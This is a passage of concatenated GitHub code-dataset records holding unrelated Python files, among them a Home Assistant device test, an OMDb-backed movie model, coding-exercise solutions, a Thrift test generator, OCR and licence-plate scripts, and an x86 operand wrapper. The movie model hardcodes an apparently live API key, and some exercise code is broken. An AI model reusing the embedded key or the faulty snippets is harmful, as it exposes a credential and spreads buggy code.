2\r\n self.dps[CALIBV_DPS] = 3\r\n self.dps[CALIBW_DPS] = 4\r\n\r\n self.assertDictEqual(\r\n self.multiSensor[\"sensor_current\"].extra_state_attributes,\r\n {\"calibration\": 1},\r\n )\r\n self.assertDictEqual(\r\n self.multiSensor[\"sensor_energy\"].extra_state_attributes,\r\n {\"calibration\": 2},\r\n )\r\n self.assertDictEqual(\r\n self.multiSensor[\"sensor_voltage\"].extra_state_attributes,\r\n {\"calibration\": 3},\r\n )\r\n self.assertDictEqual(\r\n self.multiSensor[\"sensor_power\"].extra_state_attributes,\r\n {\"calibration\": 4},\r\n )\r\n","repo_name":"make-all/tuya-local","sub_path":"tests/devices/test_grid_connect_double_power_point.py","file_name":"test_grid_connect_double_power_point.py","file_ext":"py","file_size_in_byte":5756,"program_lang":"python","lang":"en","doc_type":"code","stars":613,"dataset":"github-code","pt":"61"} +{"seq_id":"21404912629","text":"import datetime\r\nimport math\r\n\r\nimport requests\r\nfrom google.cloud import ndb\r\n\r\nfrom backend import error\r\n\r\n\r\nclass NotFound(error.Error):\r\n pass\r\n\r\n\r\nclass Movie(ndb.Model):\r\n created = ndb.DateTimeProperty(indexed=False)\r\n title = ndb.StringProperty(required=True, indexed=True)\r\n year = ndb.StringProperty(indexed=True)\r\n imdbID = ndb.StringProperty(indexed=True)\r\n poster = ndb.StringProperty()\r\n normalized_title = ndb.ComputedProperty(\r\n lambda self: self.title and self.title.lower(), indexed=True\r\n )\r\n\r\n @classmethod\r\n def _query(cls, *filters, **kwargs):\r\n count = super()._query().count()\r\n if abs(count - 100) > 10:\r\n for page in range(1, math.ceil((100 - count) / 10) + 1):\r\n search_word = \"holiday\"\r\n movies = requests.get(\r\n f\"{cls._api_host}?s={search_word}&type=movie\"\r\n f\"&apikey={cls._apikey}&page={page}\"\r\n ).json()\r\n for item in movies.get(\"Search\", []):\r\n cls.create(\r\n title=item.get(\"Title\"),\r\n year=item.get(\"Year\"),\r\n imdbID=item.get(\"imdbID\"),\r\n poster=item.get(\"Poster\"),\r\n )\r\n count += 1\r\n if count >= 100:\r\n break\r\n # count = super()._query().count()\r\n # print(f\"{count} movies in database\")\r\n return super()._query(*filters, **kwargs)\r\n\r\n _apikey = \"3a396d25\"\r\n _api_host = \"https://www.omdbapi.com/\"\r\n query = _query\r\n\r\n @classmethod\r\n def get_by_title(cls, title):\r\n entities = cls.query(cls.title == title).fetch(1)\r\n return entities[0] if entities else None\r\n\r\n @classmethod\r\n def list(cls, offset=0, limit=10):\r\n return cls.query().order(Movie.title).fetch(offset=offset, limit=limit)\r\n\r\n @classmethod\r\n def create(cls, title: str, year=None, imdbID=None, poster=None):\r\n entity = cls(\r\n created=datetime.datetime.now(),\r\n title=title,\r\n year=year,\r\n imdbID=imdbID,\r\n poster=poster,\r\n )\r\n\r\n if all(x is None for x in (year, imdbID, poster)):\r\n resp = requests.get(\r\n f\"{cls._api_host}?t={title}&apikey={cls._apikey}\"\r\n ).json()\r\n entity.year = resp.get(\"Year\")\r\n entity.imdbID = resp.get(\"imdbID\")\r\n entity.poster = resp.get(\"Poster\")\r\n\r\n entity.put()\r\n return entity\r\n\r\n @classmethod\r\n def delete(cls, imdbID):\r\n entities = cls.query(cls.imdbID == imdbID).fetch(1)\r\n if entities:\r\n entities[0].key.delete()\r\n return True\r\n return False\r\n\r\n @property\r\n def id(self):\r\n return self.key.urlsafe().decode(\"utf-8\")\r\n\r\n def __hash__(self):\r\n return hash((self.__class__.__name__, self.id))\r\n","repo_name":"skippdot/abonea-python-test","sub_path":"backend/movie.py","file_name":"movie.py","file_ext":"py","file_size_in_byte":2984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"76007474","text":"\ndef anagramMappings(A:List[int], B:List[int]) -> List[int]:\n\n\tmapdict = {}\n\n\tfor i in range(0,len(B)):\n\t\tmapdict[B[i]] = i\n\n\tprint(mapdict)\n\n\tansArray = []\n\tfor i in range(0,len(A)):\n\t\tansArray.append(mapdict[A[i]])\n\n\treturn ansArray \n\n\ndef anagramMappings_my(A:List[int], B:List[int]) -> List[int]:\n\n\tansArray = []\n\tfor i in xrange(0,len(A)):\n\t\tfor j in xrange(0,len(B)):\n\t\t\tif A[i] == B[j]:\n\t\t\t\tansArray[i] = j\n\n\treturn ansArray","repo_name":"PanJianTing/LeetCode","sub_path":"760_FindAnagramMappings.py","file_name":"760_FindAnagramMappings.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16599749428","text":"#Smoothstaick Python Basics Day 2a\r\n#Coding Exercise 3\r\n#Patrick Hedquist\r\n#####################################\r\n\r\n#Question 1\r\n#write a string that returns the letter 'r' from 'Hello world'\r\n#For example, 'Hello World'[0] returns 'H'. It should be one line of code\r\n#dont assign a variable to the string\r\n\r\nprint('Hello world'[8])\r\n\r\n#Question 2\r\n#String slicing to grab the word 'ink' from the word 'thinker'\r\n#S='hello' what is the output of h[1]? Answer: 'e'\r\n\r\nprint('thinker'[2:5])\r\nprint('\\n')\r\n\r\n#Question 3\r\n#S='Sammy' what is the output of S[2:]? Answer: mmy\r\n\r\nprint('Sammy'[2:])\r\nprint('\\n')\r\n\r\n#Question 4\r\n#With a single set function can you turn the word 'Mississippi' to distinct chatacter word?\r\n\r\nprint(set('Mississippi'))\r\nprint('\\n')\r\n\r\n#Question 5\r\n#The word or whole phase which has the same sequence of letters in both directions is called a palindrome\r\n#Here are a few examples\r\n# Stats\r\n# Amore, rose\r\n# No 'x' in Nixon\r\n# Was it a cat I saw?\r\n#your goal is to determine whether the phrase represents a palindrome or not\r\n\r\n\r\ninput1 = input(\"Enter word to test: \") #prints \"Enter word to test: \" and user can input a word\r\nlist = [input1] #creates a list using the word user inputted\r\ncont = input(\"add another word?(y/n)\") #ask user if they want to add new word\r\n\r\nwhile cont != 'n': #checks if answer is NOT n\r\n if cont == 'y': #checks if answer was y\r\n input2 = input(\"Enter word to test: \") #input word prompt\r\n list = list + [input2] #update list\r\n cont = input(\"add another word?(y/n)\") #ask user if they want new word\r\n\r\nfor i in list: #prints items in list on new lines\r\n print(i)\r\n\r\nans = []\r\n\r\n\r\ndef palindrome(pal): #algorithm based off code from Sachin Bisht on geeksforgeeks\r\n j = 0\r\n k = len(pal)-1\r\n pal = pal.lower()\r\n\r\n while (j <= k): #while loop to iterate through list and test palindromes\r\n if(not(pal[j] >= 'a' and pal[j] <= 'z')):\r\n j += 1\r\n elif (not(pal[k] >= 'a' and pal[k] <= 'z')):\r\n k -= 1\r\n elif (pal[j] == pal[k]):\r\n j += 1\r\n k -= 1\r\n else:\r\n return False\r\n return True\r\n\r\nfor i in list:\r\n if(palindrome(i)):\r\n ans = ans + ['Y']\r\n else:\r\n ans = ans + ['N']\r\n\r\nprint(len(list))\r\nprint(ans) #print ans list\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"prhedquist/SmoothStackAssignments","sub_path":"day2a.py","file_name":"day2a.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9289268237","text":"import argparse\nimport doctest\nimport os\nimport sys\nfrom enum import Enum\nfrom typing import Dict, Iterable, List, TextIO\n\n\nclass Target(Enum):\n NAME = 0\n THRIFT = 1\n CPP2 = 2\n\n\nTHRIFT_HEADER = f\"\"\"# This file was generated by `thrift/test/testset/generator.py`\n# {'@'}generated\n\nnamespace cpp2 apache.thrift.test.testset\n\"\"\"\n\nCPP2_HEADER = f\"\"\"// This file was generated by `thrift/test/testset/generator.py`\n// {'@'}generated\n\n#pragma once\n\n#include \n#include \n#include \n#include \n\nnamespace apache::thrift::test::testset {{\n\nenum class FieldModifier {{\n Optional = 1,\n Required,\n Reference,\n}};\n\nnamespace detail {{\n\ntemplate \nusing mod_set = fatal::sort>;\n\ntemplate \nstruct struct_ByFieldType;\n\ntemplate \nstruct exception_ByFieldType;\n\ntemplate \nstruct union_ByFieldType;\n\"\"\"\n\nCPP2_FOOTER = \"\"\"\n} // namespace detail\n\ntemplate \nusing struct_with = typename detail::struct_ByFieldType>::type;\n\ntemplate \nusing exception_with = typename detail::exception_ByFieldType>::type;\n\ntemplate \nusing union_with = typename detail::union_ByFieldType>::type;\n\n} // namespace apache::thrift::test::testset\n\"\"\"\n\nPRIMITIVE_TYPES = (\n \"bool\",\n \"byte\",\n \"i16\",\n \"i32\",\n \"i64\",\n \"float\",\n \"double\",\n \"binary\",\n \"string\",\n)\n\nKEY_TYPES = (\n \"string\",\n \"i64\",\n)\n\nCPP2_TYPE_NS = \"conformance::type\"\n\nPRIMATIVE_TRANSFORM: Dict[Target, str] = {\n Target.NAME: \"{}\",\n Target.THRIFT: \"{}\",\n Target.CPP2: CPP2_TYPE_NS + \"::{}_t\",\n}\n\nSTRUCT_TRANSFORM: Dict[Target, str] = {\n Target.NAME: \"struct_{}\",\n Target.THRIFT: \"struct {}\",\n Target.CPP2: CPP2_TYPE_NS + \"::struct_t<{}>\",\n}\n\nUNION_TRANSFORM: Dict[Target, str] = {\n Target.NAME: \"union_{}\",\n Target.THRIFT: \"union {}\",\n Target.CPP2: CPP2_TYPE_NS + \"::union_t<{}>\",\n}\n\nEXCEPTION_TRANSFORM: Dict[Target, str] = {\n Target.NAME: \"exception_{}\",\n Target.THRIFT: \"exception {}\",\n Target.CPP2: CPP2_TYPE_NS + \"::exception_t<{}>\",\n}\n\nLIST_TRANSFORM: Dict[Target, str] = {\n Target.NAME: \"list_{}\",\n Target.THRIFT: \"list<{}>\",\n Target.CPP2: CPP2_TYPE_NS + \"::list<{}>\",\n}\n\nSET_TRANSFORM: Dict[Target, str] = {\n Target.NAME: \"set_{}\",\n Target.THRIFT: \"set<{}>\",\n Target.CPP2: CPP2_TYPE_NS + \"::set<{}>\",\n}\n\nMAP_TRANSFORM: Dict[Target, str] = {\n Target.NAME: \"map_{}_{}\",\n Target.THRIFT: \"map<{}, {}>\",\n Target.CPP2: CPP2_TYPE_NS + \"::map<{}, {}>\",\n}\n\nOPTIONAL_TRANSFORM: Dict[Target, str] = {\n Target.NAME: \"optional_{}\",\n Target.THRIFT: \"optional {}\",\n Target.CPP2: \"{}|FieldModifier::Optional\",\n}\n\nREQUIRED_TRANSFORM: Dict[Target, str] = {\n Target.NAME: \"required_{}\",\n Target.THRIFT: \"required {}\",\n Target.CPP2: \"{}|FieldModifier::Required\",\n}\n\nCPP_REF_TRANSFORM: Dict[Target, str] = {\n Target.NAME: \"{}_cpp_ref\",\n Target.THRIFT: \"{} (cpp.ref = 'true')\",\n Target.CPP2: \"{}|FieldModifier::Reference\",\n}\n\n\ndef gen_primatives(\n target: Target, prims: Iterable[str] = PRIMITIVE_TYPES\n) -> Dict[str, str]:\n result = {}\n for prim in prims:\n value = PRIMATIVE_TRANSFORM[target].format(prim)\n result[PRIMATIVE_TRANSFORM[Target.NAME].format(prim)] = value\n return result\n\n\ndef _gen_unary_tramsform(\n transform: Dict[Target, str], target: Target, values: Dict[str, str]\n) -> Dict[str, str]:\n result = {}\n for name, value_t in values.items():\n result[transform[Target.NAME].format(name)] = transform[target].format(value_t)\n return result\n\n\ndef gen_lists(target: Target, values: Dict[str, str]) -> Dict[str, str]:\n return _gen_unary_tramsform(LIST_TRANSFORM, target, values)\n\n\ndef gen_sets(target: Target, values: Dict[str, str]) -> Dict[str, str]:\n return _gen_unary_tramsform(SET_TRANSFORM, target, values)\n\n\ndef gen_maps(\n target: Target, keys: Dict[str, str], values: Dict[str, str]\n) -> Dict[str, str]:\n result = {}\n for key_name, key_t in keys.items():\n for value_name, value_t in values.items():\n name = MAP_TRANSFORM[Target.NAME].format(key_name, value_name)\n value = MAP_TRANSFORM[target].format(key_t, value_t)\n result[name] = value\n return result\n\n\ndef gen_optional(target: Target, values: Dict[str, str]) -> Dict[str, str]:\n return _gen_unary_tramsform(OPTIONAL_TRANSFORM, target, values)\n\n\ndef gen_required(target: Target, values: Dict[str, str]) -> Dict[str, str]:\n return _gen_unary_tramsform(REQUIRED_TRANSFORM, target, values)\n\n\ndef gen_cpp_ref(target: Target, values: Dict[str, str]) -> Dict[str, str]:\n return _gen_unary_tramsform(CPP_REF_TRANSFORM, target, values)\n\n\ndef gen_union_fields(target: Target) -> Dict[str, str]:\n \"\"\"Generates field name -> type that are appropriate for use in unions.\"\"\"\n prims = gen_primatives(target, PRIMITIVE_TYPES)\n keys = gen_primatives(target, KEY_TYPES)\n\n lists = gen_lists(target, prims)\n sets = gen_sets(target, keys)\n maps = gen_maps(target, keys, prims)\n\n maps_to_sets = gen_maps(target, keys, sets)\n\n ret = {**prims, **lists, **sets, **maps, **maps_to_sets}\n ret.update(gen_cpp_ref(target, ret))\n return ret\n\n\ndef gen_struct_fields(target: Target) -> Dict[str, str]:\n \"\"\"Generates field name -> type that are appropriate for use in structs.\"\"\"\n ret = gen_union_fields(target)\n ret.update(**gen_optional(target, ret), **gen_required(target, ret))\n return ret\n\n\ndef gen_thrift_def(\n transform: Dict[Target, str], name: str, field_types: List[str]\n) -> str:\n \"\"\"Generate thrift struct from types\n >>> print(gen_thrift_def(STRUCT_TRANSFORM, \"Foo\", [\"i64\", \"optional string\", \"set (cpp.ref = 'true')\"]))\n struct Foo {\n 1: i64 field_1;\n 2: optional string field_2;\n 3: set (cpp.ref = 'true') field_3;\n } (thrift.uri=\"facebook.com/thrift/test/testset/Foo\")\n \"\"\"\n decl = transform[Target.THRIFT].format(name)\n lines = [f\"{decl} {{\"]\n for idx, field_type in enumerate(field_types):\n lines.append(\" {0}: {1} field_{0};\".format(idx + 1, field_type))\n lines.append(f'}} (thrift.uri=\"facebook.com/thrift/test/testset/{name}\")')\n return \"\\n\".join(lines)\n\n\ndef print_thrift_defs(\n transform: Dict[Target, str],\n fields: Dict[str, str],\n count: int = 1,\n *,\n file: TextIO = sys.stdout,\n) -> List[str]:\n \"\"\"Prints one thrift class def per field in fields and returns the names of all the classes.\"\"\"\n empty_name = transform[Target.NAME].format(\"empty\")\n print(gen_thrift_def(transform, empty_name, []), file=file)\n classes = [empty_name]\n for name, value_t in fields.items():\n class_name = transform[Target.NAME].format(name)\n classes.append(class_name)\n print(gen_thrift_def(transform, class_name, [value_t] * count), file=file)\n return classes\n\n\ndef gen_thrift(path: str) -> None:\n with open(path, \"w\") as file:\n print(THRIFT_HEADER, file=file)\n classes = []\n\n # Generate all structs.\n struct_fields = gen_struct_fields(Target.THRIFT)\n classes.extend(print_thrift_defs(STRUCT_TRANSFORM, struct_fields, file=file))\n\n # Generate all exceptions, with the struct fields.\n print_thrift_defs(EXCEPTION_TRANSFORM, struct_fields, file=file)\n\n # Generate all unions.\n union_fields = gen_union_fields(Target.THRIFT)\n classes.extend(\n print_thrift_defs(UNION_TRANSFORM, union_fields, count=2, file=file)\n )\n\n # Generate a struct of all defined structs and unions.\n all_struct_name = STRUCT_TRANSFORM[Target.NAME].format(\"all\")\n print(gen_thrift_def(STRUCT_TRANSFORM, all_struct_name, classes), file=file)\n\n\nCPP2_SPECIALIZE_TEMPLATE = \"\"\"template <>\nstruct {}<{}, mod_set<{}>> {{\n using type = {};\n}};\n\"\"\"\n\n\ndef print_cpp2_specialization(\n transform: Dict[Target, str], fields: Dict[str, str], *, file: TextIO = sys.stdout\n) -> None:\n for field, value_mods in fields.items():\n splits = value_mods.split(\"|\")\n value_t = splits[0]\n mods = \", \".join(splits[1:])\n by_type = transform[Target.NAME].format(\"ByFieldType\")\n name = transform[Target.NAME].format(field)\n print(CPP2_SPECIALIZE_TEMPLATE.format(by_type, value_t, mods, name), file=file)\n\n\ndef gen_cpp2(path: str) -> None:\n with open(path, \"w\") as file:\n print(CPP2_HEADER, file=file)\n\n # Generate specialization for all structs.\n struct_fields = gen_struct_fields(Target.CPP2)\n print_cpp2_specialization(STRUCT_TRANSFORM, struct_fields, file=file)\n\n # Generate specialization for all exceptions.\n print_cpp2_specialization(EXCEPTION_TRANSFORM, struct_fields, file=file)\n\n # Generate specialization for all unions.\n union_fields = gen_union_fields(Target.CPP2)\n print_cpp2_specialization(UNION_TRANSFORM, union_fields, file=file)\n\n print(CPP2_FOOTER, file=file)\n\n\ndef generate(dir: str) -> None:\n gen_thrift(os.path.join(dir, \"testset.thrift\"))\n gen_cpp2(os.path.join(dir, \"Testset.h\"))\n\n\ndef main() -> None:\n doctest.testmod()\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--install_dir\", required=True)\n args = parser.parse_args()\n generate(args.install_dir)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Dakingrai/ood-generalization-semantic-boundary-techniques","sub_path":"third_party/fbthrift/thrift/test/testset/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":9612,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"32977523908","text":"import sys\nimport os.path\nimport re\nimport math\n\nsys.path.append(os.path.dirname(os.path.realpath(__file__))+'/util')\nimport helpers\n\n\nfilename = './gmail_uber.json';\nregexp = re.compile('(\\| (.*?) [0-9]{0,6}, India)', re.IGNORECASE)\n#8:56pm | Vijaya Raghava Rd, Parthasarathi Puram, T Nagar, Chennai, Tamil Nadu 600017, India 09:15pm |\n\nsplit = 4\nthresold = 80\n\ndef split_str(string):\n\t\n\tchar = ''\n\tsegments = []\n\tfor k,c in enumerate(string):\n\t\tif k%split == 0 and k > 0:\n\t\t\tsegments.append(char)\n\t\t\tchar = ''\n\t\t\n\t\tchar += c\n\n\treturn segments\n\t\t\t\ndef percentage(segments1, segments2):\n\tcount1 = len(segments1)\n\tcount2 = len(segments2)\n\n\tif count1 <= count2:\n\t\tsegments = segments1\n\t\talt_segments = segments2\n\t\tcount = count1;\n\telse:\n\t\tsegments = segments2\n\t\talt_segments = segments1\n\t\tcount = count2;\n\n\tmatch_count = 0;\n\tfor k,segment in enumerate(segments):\n\t\tif alt_segments[k] == segment:\n\t\t\tmatch_count += 1;\n\n\treturn math.ceil((match_count/count)*100)\t\t\n\t\n\ndef compare_str(string1, string2):\n\tstring1 = helpers.alpha_numeric(string1)\n\tstring2 = helpers.alpha_numeric(string2)\n\n\tsegments1 = split_str(string1)\n\tsegments2 = split_str(string2)\n\n\tif percentage(segments1, segments2) >= thresold:\n\t\treturn True\n\n\treturn False\t\n\n\ndef unique(a):\n\t\n\ti1 = 0\n\tfor i in a[i1:-1]:\n\t\ti2 = i1+1\n\t\tfor k in a[i2:]:\n\t\t\tif compare_str(a[i1],a[i2]):\n\t\t\t\t#print('Removing ...'+a[i2], \"\\t Index: %s\" %i2)\n\t\t\t\ta.pop(i2)\n\t\t\telse:\n\t\t\t\ti2 += 1\n\n\t\ti1 += 1\n\n\treturn a\n\t\t\t\t\n\ndef file_to_str(filename):\n\twith open(filename) as f:\n\t\treturn f.read()\n\ndef extract(contents):\n\treturn (match[0].strip('|, ') for match in re.findall(regexp, contents))\t\t\n\n\n\nif __name__ == '__main__':\n\t\n\ti = 0;\n\tfh = open('output.txt', 'w')\n\n\tcontents = list(extract(file_to_str(filename)))\n\tcontents = unique(contents)\n\tfor line in contents:\n\t\ti += 1;\n\t\tfh.write(\"%s\" % i +\". \"+line+\"\\n\")\n\n\t\n\n\n","repo_name":"j81k/parser","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5846035956","text":"\"\"\"\nSurprisingly there are only three numbers that can be written as the sum of fourth powers of their digits:\n 1634 = 1**4 + 6**4 + 3**4 + 4**4\n 8208\n 9474\n\n The sum of these numbers is 19316.\n\n Find the sum of all the numbers that can be written as the sum of Nth powers of their digits.\n\n\"\"\"\nfrom itertools import product\n\n\n\n\ndef max_number_len(n):\n \"\"\"Find max power of 10 which can be less or equals than sum of its digits power.\"\"\"\n power_of_9 = 9**n\n k = 1\n while k*power_of_9 >= 10 ** k:\n k += 1\n return k\n\n\ndigits = [i for i in range(10)]\ndigit_power = [0] * 10\nsum_powers = set()\n\n\ndef digits_product(k):\n nums = [0] * k\n while True:\n yield nums\n for i in range(k):\n nums[i] += 1\n if nums[i] != 10:\n for j in range(i):\n if nums[j] < nums[i]:\n nums[j] = nums[i]\n break\n nums[i] = 0\n if i == k-1:\n return\n\n\ndef number_to_digits(num):\n \"\"\"Return sorted list of digits in number.\"\"\"\n return sorted(int(ch) for ch in str(num))\n\n\ndef find_sum(n):\n for i in range(10):\n digit_power[i] = i ** n\n\n sum_len = 2\n while sum_len * digit_power[9] >= 10 ** (sum_len - 1):\n for p in digits_product(sum_len):\n p_sum = sum(digit_power[digit] for digit in p)\n if sorted(p) == number_to_digits(p_sum):\n sum_powers.add(p_sum)\n sum_len += 1\n return sum(sum_powers)\n\n\n# print(find_sum(5))\nn = int(input())\nprint(find_sum(n))\n\n","repo_name":"mqq-marek/ProjectEuler","sub_path":"ProjectEuler/Problems_001_050/P030_DigitNthPowers.py","file_name":"P030_DigitNthPowers.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32890860175","text":"import dataset\nimport models.crnn as crnn\nimport torch\nimport utils\nfrom PIL import Image\nfrom torch.autograd import Variable\n\nfrom definitions import ROOT_DIR\n\nmodel_path = ROOT_DIR + \"/scr/text_recognition/crnn_pytorch/data/crnn.pth\"\nalphabet = \"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\n\ndef recognize_text(img_path: str) -> str:\n model = crnn.CRNN(32, 1, 37, 256)\n if torch.cuda.is_available():\n model = model.cuda()\n\n model.load_state_dict(torch.load(model_path))\n\n converter = utils.strLabelConverter(alphabet)\n\n transformer = dataset.resizeNormalize((100, 32))\n image = Image.open(img_path).convert(\"L\")\n image = transformer(image)\n if torch.cuda.is_available():\n image = image.cuda()\n image = image.view(1, *image.size())\n image = Variable(image)\n\n model.eval()\n preds = model(image)\n\n _, preds = preds.max(2)\n preds = preds.transpose(1, 0).contiguous().view(-1)\n\n preds_size = Variable(torch.IntTensor([preds.size(0)]))\n raw_pred = converter.decode(preds.data, preds_size.data, raw=True)\n sim_pred = converter.decode(\n preds.data, preds_size.data, raw=False\n ) # print('%-20s => %-20s' % (raw_pred, sim_pred))\n return sim_pred\n","repo_name":"Sandpitturtleee/image_to_text_detection","sub_path":"scr/text_recognition/crnn_pytorch/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27421896562","text":"#!/bin/python3\n\nfrom urllib.request import urlopen\nfrom urllib.parse import urlencode\nimport re\n\n\nzotxturl = \"http://127.0.0.1:23119/zotxt/\"\nzotxturlselect = zotxturl + 'select?'\nlinkurl = \"zotero://select/items/\"\npattern = re.escape(linkurl) + r'([@]*)(.+)'\npattern = re.compile(pattern)\n\ndef main(arg):\n data = {}\n m = pattern.match(arg)\n if m.group(1) == '@':\n data['betterbibtexkey'] = m.group(2)\n else:\n data['key'] = m.group(2)\n data = urlencode(data)\n url = zotxturlselect + data\n try:\n urlopen(url)\n except Exception as e:\n print(f'ERROR: got an exception {e}\\n{m.group(0)}\\n{url}')\n\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser(description='This program use zotxt to select an '\n 'entry in Zotero')\n parser.add_argument('url', help='Zotero URL')\n\n args = parser.parse_args()\n main(args.url)\n","repo_name":"shivams/zim-zotero-plugin","sub_path":"zotxt-select.py","file_name":"zotxt-select.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"61"} +{"seq_id":"39694018128","text":"a = int(input(\"Enter a value of a:\")) #просимо ввести нижню межу вимірювання\nb = int(input(\"Enter a value of b:\")) #просимо ввести верхню межу вимірювання\ni = a\nfor i in range(a, b): #проводимо пошук від а до b\n n = 0\n for j in range(1, i-1):\n if i % j == 0:\n n += j #знаходимо суму дільників числа\n if n == i: #перевіряємо число на досконалість\n print(n) #виводмио число, якщо воно досконале\n","repo_name":"kopeishnik/IP-01-Zelenskyi-labs","sub_path":"lab5-py.py","file_name":"lab5-py.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20419737854","text":"import logging\nimport sqlite3\nimport datetime\nfrom logger import logger\n\nfrom sqlalchemy import create_engine, MetaData, select, text\nfrom sqlalchemy.orm import sessionmaker\n\nimport easyocr\nimport os\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport util\nfrom dbi import create_plates\n\n\ndef search_plate(name_file, dir):\n\n \"\"\" search only plate in new car image \"\"\"\n model_cfg_path = os.path.join('.', 'model', 'cfg', 'darknet-yolov3.cfg')\n model_weights_path = os.path.join('.', 'model', 'weights', 'model.weights')\n class_names_path = os.path.join('.', 'model', 'class.names')\n\n img_path = dir\n\n \"\"\" load class names \"\"\"\n with open(class_names_path, 'r') as f:\n class_names = [j[:-1] for j in f.readlines() if len(j) > 2]\n f.close()\n\n \"\"\" load model \"\"\"\n net = cv2.dnn.readNetFromDarknet(model_cfg_path, model_weights_path)\n\n \"\"\" load image \"\"\"\n croop_image = cv2.imread(img_path)\n img = croop_image[600:1000, 800:1600]\n\n #cv2.imwrite(\"model/gfg.jpg\", img)\n\n H, W, _ = img.shape\n\n \"\"\" convert image \"\"\"\n blob = cv2.dnn.blobFromImage(img, 1 / 255, (416, 416), (0, 0, 0), True)\n\n \"\"\" get detections \"\"\"\n net.setInput(blob)\n\n detections = util.get_outputs(net)\n\n \"\"\" bboxes, class_ids, confidences \"\"\"\n bboxes = []\n class_ids = []\n scores = []\n\n for detection in detections:\n # [x1, x2, x3, x4, x5, x6, ..., x85]\n bbox = detection[:4]\n\n xc, yc, w, h = bbox\n bbox = [int(xc * W), int(yc * H), int(w * W), int(h * H)]\n\n bbox_confidence = detection[4]\n\n class_id = np.argmax(detection[5:])\n score = np.amax(detection[5:])\n\n bboxes.append(bbox)\n class_ids.append(class_id)\n scores.append(score)\n\n \"\"\" apply nms \"\"\"\n bboxes, class_ids, scores = util.NMS(bboxes, class_ids, scores)\n\n \"\"\" plot \"\"\"\n\n reader = easyocr.Reader(['en'])\n plate = False\n for bbox_, bbox in enumerate(bboxes):\n xc, yc, w, h = bbox\n\n plate = True\n license_plate = img[int(yc - (h / 2)):int(yc + (h / 2)), int(xc - (w / 2)):int(xc + (w / 2)), :].copy()\n\n img = cv2.rectangle(img,\n (int(xc - (w / 2)), int(yc - (h / 2))),\n (int(xc + (w / 2)), int(yc + (h / 2))),\n (0, 255, 0),\n 10)\n\n # output = reader.readtext(license_plate)\n # print(output)\n\n #plt.figure()\n #plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\n\n #plt.figure()\n\n if plate == True:\n\n license_plate = cv2.cvtColor(license_plate, cv2.COLOR_BGR2GRAY)\n license_plate = cv2.bilateralFilter(license_plate, 11, 17, 17)\n\n cv2.imwrite(\"model/only_plate/\" + name_file, license_plate)\n cv2.imwrite(\"static/\" + name_file, license_plate)\n logger.info(\"saved new plate\")\n\n #plt.show()\n\n new_plate(name_file)\n\n else:\n logger.error(\"It's not car or something wrong...\")\n logger.info(\"I'm waiting for next image...\")\n\n\ndef new_plate(name_file):\n\n \"\"\" saved text plate in db \"\"\"\n sql_url = \"sqlite:///data.db\"\n\n temp = [\n datetime.datetime.now().strftime(\"%Y-%m-%d\"),\n datetime.datetime.now().strftime(\"%H:%M:%S\"),\n \"KR1234\",\n ' None:\n self.op = op\n self.x64 = x64\n\n @property\n def is_imm(self) -> bool:\n \"\"\"Is it immediate operand?\"\"\"\n return self.op.type == Operand._x86_op_imm\n\n @property\n def is_reg(self) -> bool:\n \"\"\"Is it register operand?\"\"\"\n return self.op.type == Operand._x86_op_reg\n\n @property\n def is_mem(self) -> bool:\n \"\"\"Is it memory operand?\"\"\"\n return self.op.type == Operand._x86_op_mem\n\n @property\n def value(self) -> Union[str, int]:\n \"\"\"\n Returns operand value or displacement value for memory operands\n\n :rtype: str or int or None\n \"\"\"\n if self.is_imm:\n return self.op.value.imm\n elif self.is_mem:\n return self.op.value.mem.disp\n elif self.is_reg:\n return self.regs[self.op.reg]\n else:\n raise Exception(\"Invalid Operand type\")\n\n @property\n def reg(self) -> Optional[Union[str, int]]:\n \"\"\"\n Returns register used by operand.\n\n For memory operands, returns base register or index register if base is not used.\n For immediate operands or displacement-only memory operands returns None.\n\n :rtype: str\n \"\"\"\n if self.is_mem:\n reg = self.op.value.mem.base or self.op.value.mem.index\n if reg:\n return self.regs[reg]\n if self.is_reg:\n return self.regs[self.op.reg]\n return None\n\n @property\n def mem(self) -> Optional[Memory]:\n \"\"\"\n Returns :class:`Memory` object for memory operands\n \"\"\"\n if not self.is_mem:\n return None\n\n mem = self.op.value.mem\n base: Optional[Union[str, int]] = None\n index: Optional[Union[str, int]] = None\n scale: Optional[int] = None\n\n if mem.base:\n base = self.regs[mem.base]\n\n if mem.index:\n index, scale = self.regs[mem.index], mem.scale\n\n return Memory(self.sizes[self.op.size], base, scale, index, mem.disp)\n\n def __eq__(self, other: Any) -> bool:\n if isinstance(other, Operand):\n return self.op.type == other.op.type and self.value == other.value\n if self.is_imm:\n return self.value == other\n if isinstance(other, str):\n other = (other,)\n if self.is_reg and self.reg in other:\n return True\n if self.is_mem and self.reg in other:\n return True\n return False\n\n def __str__(self) 